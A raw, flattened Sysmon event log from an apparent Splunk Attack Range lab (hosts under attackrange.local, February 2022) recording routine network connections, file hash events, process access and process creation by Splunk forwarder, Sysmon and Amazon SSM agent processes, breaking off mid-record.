11:02:03.294{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53885-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:05.004{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B952266511D02BE8D562011FDD1374,SHA256=682E5D5F2C33627BE37ABE034E3B0AE99FE3126386BDA72594647B0D9D339D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:06.968{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195D066E6222455155DB2F3328B31151,SHA256=DF86DC6B7AA2A405DF8D3E98B0BCBBEB1D5A0592B5E358878B36D6B798AD1348,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:04.547{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53886-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:06.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA4EBA4BEBD19C0EA9274AA50F4856B,SHA256=54649CCD11429E25799AEA1953ABAF0483B7B425D54EC6533D47C48379FF50DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:07.032{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F35857AE8CC8E6786EDC19AD992FD789,SHA256=7CE7C99A19730C2ED9B6641C60A5411F018A8E907D035F091265EE15EB850A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:08.187{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23AD00C461C4C6EB3045DDB7C2EE7373,SHA256=D1FA5E1C871FE694BD19D18BD2A92CE81290BB90FB11A424076D875EE729D71F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:08.047{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1A4CBAFF1D4718CFCDAEF292F6E683,SHA256=404C9CFB3BB1E1C1D3DEB4A1247E08B68376E34EEE10FD042BE565D02FC14F46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:09.203{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B1B57C5FFB009CBCF8060F0D5A1E5D,SHA256=131F2E9B2598AE8A050C03F1164BAA8A34CD3A42E75F70CCE3AB5A9C7D85831F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:09.060{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACEC460E304F9299F8D5B7728EEC7C30,SHA256=2C842F9E8C4C09CB4A71927055D04DDF8F8EC36FC1B291E107E998F8D8D46A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:10.203{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D468FE5998C73E830891AEE6C6B7571,SHA256=E39A766B5EED7BFAF246000DEC450897AAAF1698DDFDEDB94865F5455E49D6FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:10.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5EEE386E886707FC17C70D0CD1247F,SHA256=C08622B2986776CFF056A23E6A0443FB8FFA9127F6F07B3147AB5DC49C9453D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:07.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51474-false10.0.1.12-8000- 23542300x8000000000000000218651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:11.218{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F6EFEF6FC05074A042ABFE900EA053C,SHA256=9E7D6E08ADB724408F842E4BFAF1E147D23C26CD2C876096BF38D0AD85364235,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:11.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5E1170D8BDED52ACAA37650968F313DF,SHA256=45B022AF8B626437015B766C644E89AD39D0CEAB41B14298B60EAB7FE1D100B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:11.827{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=49E7B7CEA5D40BAC19E35FBDBFF2FDAE,SHA256=5F86AFE422CF920355827EEE959FB3592C9E90BD7461F5F390DA12FCFC130681,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:09.679{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53887-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:11.147{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2C3E590AA9BEAADE700CA2248D37E04,SHA256=18AE86F6057E5026FFCBFE5C165CC0031A853A32930EEA8DCD99803E74EC8966,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:12.218{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE36504ECA7CF99524D96CDAE8942CB1,SHA256=EE4EE4F28DC35382D36E60D8021FBD93414BBA0070B2282B5AC2139D89814C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:12.157{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A414CAD7E6CFB289D286B4ED9C67A4A,SHA256=27B0796584F0BEC0A59A07DF6432209E79FDE3463139A34B8FA029044A794E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:13.234{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F8E23DF1DFFE4270D4D8C10CE290CEE,SHA256=D8739F1DAD33BBEF6136BEA144AB8F3613085FB67D1699DC60E49BD708C49DDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:13.171{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B318F15FEA9204AE0F5757891FD7806E,SHA256=0C9EACA611D1F94F28106599E3EC2C61276BE15ABFFB0B217073C312D3C09000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:14.187{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0C6CA09742A9B2D02E193151B4BA52,SHA256=D18C891CCD1D427CF9F1EA8D158B3F5783862DD800D21437C4CEB26EFE4F5A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:14.359{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6975B0643BC97EE1D0BCC29B5BF87BF5,SHA256=59ED5322C7EFDB1BCBBA524D06026629873C1C02CE673029D5464397930ADBE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:15.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=721E7B596AD32F5D739BB727F584EFB0,SHA256=812BAE8AF18D1D8BB7544AC08C180671AAD8E2483EF1726950539BA5524F7AB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:15.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7975BCFC394AAB3CCC0F6BA4CB5B13BE,SHA256=544148146B8DCEF1731DD8E36AE788327D6F7FF8B3E78C9DE059DB3DB4B96BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:15.082{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-145MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:16.469{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB5052246AF4F0558D54F29C45AE6664,SHA256=060D6952F07CF4E93975ED8556D8B8005D7101C6B8F3A8EE0C05E256270AA613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:16.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70309D3574082EE3487B0DCC90D6C5DE,SHA256=C3D542033D203CE2BAE7B55E4E405C957ADBC16BDB14E8788062C44C1B56E19A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:13.527{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51475-false10.0.1.12-8000- 23542300x8000000000000000218657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:16.097{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-146MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:17.471{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE76F59C04F7EC669598277E3A1D3256,SHA256=204C5C81A75E552B9A66FC8AD835EC8EB223F1F93A7BFAB829EA550E209D5E03,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:15.512{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53889-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:17.227{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6AF45907EA9ADD99041B0AEE39EE6B,SHA256=FEE463B7A93E04E7167A016C5F8D1EE8DE4E494A9127C286125092CBFA7FF75E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:18.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E701859EDF29C5A40E1F004B2477BC74,SHA256=6C39F7090064B430F7DC52D77734244BCA86B8113A5659843CDCFED75F4539FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:18.243{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CBFF563403441A80E704ACF3918D7F,SHA256=4212952EA90B26809D6855D2A2B8AB0602B1CBE4E51543F84C0B8F3FE3EB9DA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:19.830{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6267951D8CC0D2046E425A44D548A6A9,SHA256=FCA099B4C756D89BC0A898031D75C56D8F3A18AC001F5E93F281950A0D07F45B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-143B-6216-9106-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-143B-6216-9106-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.871{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-143B-6216-9106-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.872{C8EA50B7-143B-6216-9106-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 